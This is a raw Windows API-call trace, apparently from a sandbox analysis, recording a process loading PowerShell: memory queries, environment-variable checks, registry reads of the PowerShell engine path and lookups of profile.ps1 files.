	[0392.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0392.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0392.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0392.993] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0392.997] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0392.997] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0392.997] CoTaskMemFree (pv=0x1b770f20) 
	[0393.001] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.006] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0393.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.007] CoTaskMemFree (pv=0x1b770f20) 
	[0393.007] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0393.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.007] CoTaskMemFree (pv=0x1b770f20) 
	[0393.007] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0393.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.007] CoTaskMemFree (pv=0x1b770f20) 
	[0393.013] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0393.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.013] CoTaskMemFree (pv=0x1b770f20) 
	[0393.017] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0393.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.018] CoTaskMemFree (pv=0x1b770f20) 
	[0393.019] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0393.019] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.019] CoTaskMemFree (pv=0x1b770f20) 
	[0393.024] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.027] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.921] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0394.670] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0394.670] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0394.670] CoTaskMemFree (pv=0x1b770f20) 
	[0395.524] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b771030
	[0395.524] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b771140
	[0396.622] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.369] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.372] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.372] VirtualQuery (in: lpAddress=0x249fe0, lpBuffer=0x24aea0, dwLength=0x30 | out: lpBuffer=0x24aea0*(BaseAddress=0x249000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x7000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.396] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.397] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.398] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.399] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.399] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.400] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.401] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.401] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.402] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.402] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.402] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.402] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.402] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.402] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.403] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.403] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.403] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.403] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.403] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.403] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.403] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.403] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.403] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.403] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.404] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.404] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.404] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.404] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.404] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.405] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0397.405] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0397.405] CoTaskMemFree (pv=0x1b771250) 
	[0397.407] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0397.407] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0397.407] CoTaskMemFree (pv=0x1b771250) 
	[0398.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0398.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0398.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0398.124] VirtualQuery (in: lpAddress=0x24b840, lpBuffer=0x24c700, dwLength=0x30 | out: lpBuffer=0x24c700*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0398.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0398.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0398.130] VirtualQuery (in: lpAddress=0x24b840, lpBuffer=0x24c700, dwLength=0x30 | out: lpBuffer=0x24c700*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.130] VirtualQuery (in: lpAddress=0x24b090, lpBuffer=0x24bf50, dwLength=0x30 | out: lpBuffer=0x24bf50*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.130] VirtualQuery (in: lpAddress=0x24b090, lpBuffer=0x24bf50, dwLength=0x30 | out: lpBuffer=0x24bf50*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.131] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d698 | out: phkResult=0x24d698*=0x340) returned 0x0
	[0398.131] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d61c, lpData=0x0, lpcbData=0x24d618*=0x0 | out: lpType=0x24d61c*=0x1, lpData=0x0, lpcbData=0x24d618*=0x56) returned 0x0
	[0398.131] CoTaskMemAlloc (cb=0x5a) returned 0x1b79e2e0
	[0398.131] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d5ec, lpData=0x1b79e2e0, lpcbData=0x24d5e8*=0x56 | out: lpType=0x24d5ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d5e8*=0x56) returned 0x0
	[0398.131] CoTaskMemFree (pv=0x1b79e2e0) 
	[0398.131] RegCloseKey (hKey=0x340) returned 0x0
	[0398.131] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d698 | out: phkResult=0x24d698*=0x340) returned 0x0
	[0398.132] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d61c, lpData=0x0, lpcbData=0x24d618*=0x0 | out: lpType=0x24d61c*=0x1, lpData=0x0, lpcbData=0x24d618*=0x56) returned 0x0
	[0398.132] CoTaskMemAlloc (cb=0x5a) returned 0x1b79e2e0
	[0398.132] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d5ec, lpData=0x1b79e2e0, lpcbData=0x24d5e8*=0x56 | out: lpType=0x24d5ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d5e8*=0x56) returned 0x0
	[0398.132] CoTaskMemFree (pv=0x1b79e2e0) 
	[0398.132] RegCloseKey (hKey=0x340) returned 0x0
	[0398.132] CoTaskMemAlloc (cb=0x20c) returned 0x1b763ad0
	[0398.132] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b763ad0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0398.132] CoTaskMemFree (pv=0x1b763ad0) 
	[0398.132] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0398.133] CoTaskMemAlloc (cb=0x20c) returned 0x1b763ad0
	[0398.133] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b763ad0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0398.133] CoTaskMemFree (pv=0x1b763ad0) 
	[0398.133] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0398.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0398.133] SetErrorMode (uMode=0x1) returned 0x1
	[0398.134] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d600 | out: lpFileInformation=0x24d600*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0398.134] SetErrorMode (uMode=0x1) returned 0x1
	[0398.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0398.134] SetErrorMode (uMode=0x1) returned 0x1
	[0398.134] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d600 | out: lpFileInformation=0x24d600*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0398.134] SetErrorMode (uMode=0x1) returned 0x1
	[0398.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0398.134] SetErrorMode (uMode=0x1) returned 0x1
	[0398.134] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d600 | out: lpFileInformation=0x24d600*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0398.134] SetErrorMode (uMode=0x1) returned 0x1
	[0398.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0398.134] SetErrorMode (uMode=0x1) returned 0x1
	[0398.135] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d600 | out: lpFileInformation=0x24d600*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0398.135] SetErrorMode (uMode=0x1) returned 0x1
	[0398.135] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0398.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.135] CoTaskMemFree (pv=0x1b771250) 
	[0398.136] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
